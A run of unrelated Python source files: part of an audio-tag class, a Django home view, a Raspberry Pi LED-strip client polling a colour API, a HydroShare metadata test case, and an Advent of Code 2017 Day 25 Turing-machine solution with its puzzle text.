DiscNumberTag(cls._disc_total, cls._disc_num_name, cls._disc_num, tags) return tag @classmethod def track_num(cls, tags): tag = NumberTag(cls._track_total_picard, cls._track_num_name, cls._track_num, tags) if tag.total is None: tag = NumberTag(cls._track_total, cls._track_num_name, cls._track_num, tags) return tag @classmethod def acoustid(cls, tags): tag = BaseTag(cls._acoustid_name, cls._acoustid, tags) return tag @classmethod def recording_mbid(cls, tags): tag = BaseTag(cls._recording_mbid_name, cls._recording_mbid, tags) return tag @classmethod def track_mbid(cls, tags): tag = BaseTag(cls._track_mbid_name, cls._track_mbid, tags) return tag ######################### # custom tags ######################### @classmethod def custom_tag(cls, name, tags): tag = BaseTag(name, name, tags) if not tag.value: serialization_name = re.sub("\s", "_", name) under_tag = BaseTag(name, serialization_name, tags) tag.value = under_tag.value tag.save() return tag
from django.http impor
t Http404 from django.shortcuts import render from directory.forms import SearchForm def home(request): searchform = SearchForm() return render(request, 'onigiri/index.html',
{'searchform' : searchform})
#!/usr/bin/env python from raspledstrip.ledstrip import * from raspledstrip.animation import * from raspledstrip.color import Color import requests import json import time import sys import traceback # Things that should be configurable ledCount = 32 * 5 api = 'http://lumiere.lighting/' waitTime = 6 class Lumiere: """ Class to handle getting light information. """ def __init__(self): """ Constructor. """ self.ledCount = ledCount self.base_url = api self
.currentID = None self.ledArray = [] self.waitTime = waitTime self.led = LEDStrip(ledCount) self.led.all_off() def listen(self): """ Handles the continual checking. "
"" while True: try: self.queryLights() time.sleep(self.waitTime) except (KeyboardInterrupt, SystemExit): raise except: print traceback.format_exc() def updateLights(self): """ Change the lights. """ self.fillArray() # Animate anim = FireFlies(self.led, self.ledArray, 1, 1, 0, self.led.lastIndex) for i in range(50): anim.step() self.led.update() # Final fill for li, l in enumerate(self.ledArray): self.led.set(li, l) self.led.update() def fillArray(self): """ Fill up LED count with all the colors. """ self.ledArray = [] ledArray = [] length = len(self.current['colors']) for x in range(0, self.ledCount - 1): ledArray.append(self.hex_to_rgb(self.current['colors'][x % length])) for li, l in enumerate(ledArray): self.ledArray.append(Color(l[0], l[1], l[2])) def queryLights(self): """ Make request to API. """ r = requests.get('%sapi/colors' % (self.base_url)) self.current = r.json() # Only update if new record if self.currentID is None or self.currentID != self.current['_id']: self.currentID = self.current['_id'] self.updateLights() def hex_to_rgb(self, value): """ Turns hex value to RGB tuple. """ value = value.lstrip('#') lv = len(value) return tuple(int(value[i:i+lv/3], 16) for i in range(0, lv, lv/3)) if __name__ == '__main__': lumiere = Lumiere() lumiere.listen()
from django.test import TestCase, TransactionTestCase from django.contrib.auth.models import Group, User from django.http import HttpRequest, QueryDict from hs_core.hydroshare import resource from hs_core import hydroshare from hs_script_resource.models import ScriptSpecificMetadata, ScriptResource from hs_script_resource.receivers import script_pre_create, script_metadata_pre_create_handler, script_metadata_pre_update_handler class TestScriptResource(TransactionTestCase): def setUp(self): self.group, _ = Group.objects.get_or_create(name='Hydroshare Author') self.user = hydroshare.create_account( 'scrawley@byu.edu', username='scrawley', first_name='Shawn', last_name='Crawley', superuser=False, groups=[self.group] ) self.allowance = 0.00001 self.resScript = hydroshare.create_resource( resource_type='ScriptResource', owner=self.user, title='Test R Script Resource', keywords=['kw1', 'kw2'] ) def test_script_res_specific_metadata(self): ####################### # Class: ScriptSpecificMetadata ####################### # no ScriptSpecificMetadata obj self.assertEqual(ScriptSpecificMetadata.objects.all().count(), 0) # create 1 ScriptSpecificMetadata obj with required params resource.create_metadata_element(self.resScript.short_id, 'ScriptSpecificMetadata', scriptLanguage='R', languageVersion='3.5', scriptVersion='1.0', scriptDependencies='None', scriptReleaseDate='2015-12-01 00:00', scriptCodeRepository='http://www.google.com') self.assertEqual(ScriptSpecificMetadata.objects.all().count(), 1) # may not create additional instance of ScriptSpecificMetadata with self.assertRaises(Exception): resource.create_metadata_element(self.resScript.short_id, 'ScriptSpecificMetadata', scriptLanguage='R', languageVersion='3.5', scriptVersion='1.0', scriptDependencies='None', scriptReleaseDate='12/01/2015', scriptCodeRepository='http://www.google.com') self.assertEqual(ScriptSpecificMetadata.objects.all().count(), 1) # update existing meta resource.update_metadata_element(self.resScript.short_id, 'ScriptSpecificMetadata', element_id=ScriptSpecificMetadata.objects.first().id, scriptLanguage='python', languageVersion='2.7') self.assertEqual(ScriptSpecificMetadata.objects.first().scriptLanguage, 'python') self.assertEqual(ScriptSpecificMetadata.objects.first().languageVersion, '2.7') # delete ScriptSpecificMetadata obj resource.delete_metadata_element(self.resScript.short_id, 'ScriptSpecificMetadata', element_id=ScriptSpecificMetadata.objects.first().id) self.assertEqual(ScriptSpecificMetadata.objects.all().count(), 0) def test_receivers(self): request = HttpRequest() # ScriptSpecificMetadata request.POST = {'scriptLanguage': 'R', 'languageVersion': '3.5'} data = script_metadata_pre_create_handler(sender=ScriptResource, element_name="ScriptSpecificMetadata", request=request) self.assertTrue(data["is_valid"]) request.POST = None data = script_metadata_pre_create_handler(sender=ScriptResource, element_name="ScriptSpecificMetadata", request=request) self.assertFalse(data["is_valid"]) data = script_pre_create(sender=ScriptResource, metadata=[], source_names=[], files=None) self.assertEqual(data[0]['scriptspecificmetadata'], {}) request.POST = {'scriptLanguage': 'R', 'languageVersion': '3.5'} data = script_metadata_pre_update_handler(sender=ScriptResource,
element_name="ScriptSpecificMetadata", request=request) self.assertTrue(data["is_valid"]) request.POST = None data = script
_metadata_pre_update_handler(sender=ScriptResource, element_name="ScriptSpecificMetadata", request=request) self.assertFalse(data["is_valid"]) def test_bulk_metadata_update(self): # here we are testing the update() method of the ScriptMetaData class # check that there are no extended metadata elements at this point self.assertEqual(self.resScript.metadata.program, None) # create program metadata self.resScript.metadata.update([{'scriptspecificmetadata': {'scriptLanguage': 'R', 'languageVersion': '3.5', 'scriptVersion': '1.0', 'scriptDependencies': 'None', 'scriptReleaseDate': '2015-12-01 00:00', 'scriptCodeRepository': 'http://www.google.com'}}], self.user) # check that there is now extended metadata elements at this point self.assertNotEqual(self.resScript.metadata.program, None) # test that we can also update core metadata using update() # there should be a creator element self.assertEqual(self.resScript.metadata.creators.count(), 1) self.resScript.metadata.update([{'creator': {'name': 'Second Creator'}}, {'creator': {'name': 'Third Creator'}}, {'scriptspecificmetadata': {'scriptVersion': '1.5'}}], self.user) # there should be 2 creators at this point (previously existed creator gets # delete as part of the update() call self.assertEqual(self.resScript.metadata.creators.count(), 2) # check that there is now extended metadata elements at this point self.assertNotEqual(self.resScript.metadata.program, None)
""" --- Day 25: The Halting Problem --- Following the twisty passageways deeper and deeper into the CPU, you finally reach the core of the computer. Here, in the expansive central chamber, you find a grand apparatus that fills the entire room, suspended nanometers above your head. You had always imagined CPUs to be noisy, chaotic places, bustling with activity. Instead, the room is quiet, motionless, and dark. Suddenly, you and the CPU's garbage collector startle each other. "It's not often we get many visitors here!", he says. You inquire about the stopped machinery. "It stopped milliseconds ago; not sure why. I'm a garbage collector, not a doctor." You ask what the machine is for. "Programs these days, don't know their origins. That's the Turing machine! It's what makes the whole computer work." You try to explain that Turing machines are merely models of computation, but he cuts you off. "No, see, that's just what they want you to think. Ultimately, inside every CPU, there's a Turing machine driving the whole thing! Too bad this one's broken. We're doomed!" You ask how you can help. "Well, unfortunately, the only way to get the computer running again would be to create a whole new Turing machine from scratch, but there's no way you can-" He notices the look on your face, gives you a curious glance, shrugs, and goes back to sweeping the floor. You find the Turing machine blueprints (your puzzle input) on a tablet in a nearby pile of debris. Looking back up at the broken Turing machine above, you can start to identify its parts: A tape which contains 0 repeated infinitely to the left and right. A cursor, which can move left or right along the tape and read or write values at its current position. A set of states, each containing rules about what to do based on the current value under the cursor. Each slot on the tape has two possible values: 0 (the starting value for all slots) and 1. Based on whether the cursor is pointing at a 0 or a 1, the current state says what value to write at the current position of the cursor, whether to move the cursor left or right one slot, and which state to use next. For example, suppose you found the following blueprint: Begin in state A. Perform a diagnostic checksum after 6 steps. In state A: If the current value is 0: - Write the value 1. - Move one slot to the right. - Continue with state B. If the current value is 1: - Write the value 0. - Move one slot to the left. - Continue with state B. In state B: If the current value is 0: - Write the value 1. - Move one slot to the left. - Continue with state A. If the current value is 1: - Write the value 1. - Move one slot to the right. - Continue with state A. Running it until the number of steps required to take the listed diagnostic checksum would result in the following tape configurations (with the cursor marked in square brackets): ... 0 0 0 [0] 0 0 ... (before any steps; about to run state A) ... 0 0 0 1 [0] 0 ... (after 1 step; about to run state B) ... 0 0 0 [1] 1 0 ... (after 2 steps; about to run state A) ... 0 0 [0] 0 1 0 ... (after 3 steps; about to run state B) ... 0 [0] 1 0 1 0 ... (after 4 steps; about to run state A) ... 0 1 [1] 0 1 0 ... (after 5 steps; about to run state B) ... 0 1 1 [0] 1 0 ... (after 6 steps; about to run state A) The CPU can confirm that the Turing machine is working by taking a diagnostic checksum after a specific number of steps (given in the blueprint). Once the specified number of steps have been executed, the Turing machine should pause; once it does, count the number of times 1 appears on the tape. In the above example, the diagnostic chec
ksum is 3. Recreate the Turing machine and save the computer! What is the diagnostic checksum it produces once it's working again
? --- Part Two --- The Turing machine, and soon the entire computer, springs back to life. A console glows dimly nearby, awaiting your command. > reboot printer Error: That command requires priority 50. You currently have priority 0. You must deposit 50 stars to increase your priority to the required level. The console flickers for a moment, and then prints another message: Star accepted. You must deposit 49 stars to increase your priority to the required level. The garbage collector winks at you, then continues sweeping. You deposit all fifty stars and reboot the printer. Suddenly, everything seems a lot less pixelated than before. "--raise your priority level enough to send the reboot command and... hey look, it's printing! I'll bring it to Santa. Thanks!" She runs off. Congratulations! You've finished every puzzle in Advent of Code 2017! I hope you had as much fun solving them as I had making them for you. I'd love to hear about your adventure; you can get in touch with me via contact info on my website or through Twitter. If you'd like to see more things like this in the future, please consider supporting Advent of Code and sharing it with others. To hear about future projects, you can follow me on Twitter. I've highlighted the easter eggs in each puzzle, just in case you missed any. Hover your mouse over them, and the easter egg will appear. """ class TuringMachine(): def __init__(self, state): self.state = state self.pos = 0 self.ones = [] def _move(self, move, next_state=None, op=None): if next_state is not None: self.state = next_state if op == 1: self.ones.append(self.pos) elif op == 0: self.ones.pop(self.ones.index(self.pos)) self.pos += move class TestTuringMachine(TuringMachine): def move(self): value = 1 if self.pos in self.ones else 0 if self.state == 'A': if value == 0: self._move(1, 'B', 1) else: self._move(-1, 'B', 0) else: if value == 0: self._move(-1, 'A', 1) else: self._move(+1, 'A') def test1(): machine = TestTuringMachine('A') for i in range(6): machine.move() assert 3 == len(machine.ones) class Part1TuringMachine(TuringMachine): def move(self): value = 1 if self.pos in self.ones else 0 if self.state == 'A': if value == 0: self._move(1, 'B', 1) else: self._move(-1, 'C', 0) elif self.state == 'B': if value == 0: self._move(-1, 'A', 1) else: self._move(1, 'D') elif self.state == 'C': if value == 0: self._move(-1, 'B') else: self._move(-1, 'E', 0) elif self.state == 'D': if value == 0: self._move(1, 'A', 1) else: self._move(1, 'B', 0) elif self.state == 'E': if value == 0: self._move(-1, 'F', 1) else: self._move(-1, 'C') elif self.state == 'F': if value == 0: self._move(1, 'D', 1) else: self._move(1, 'A') def part1(): machine = Part1TuringMachine('A') for i in range(12667664): machine.move() print( len(machine.ones)) if __name__ == '__main__': # test1() part1()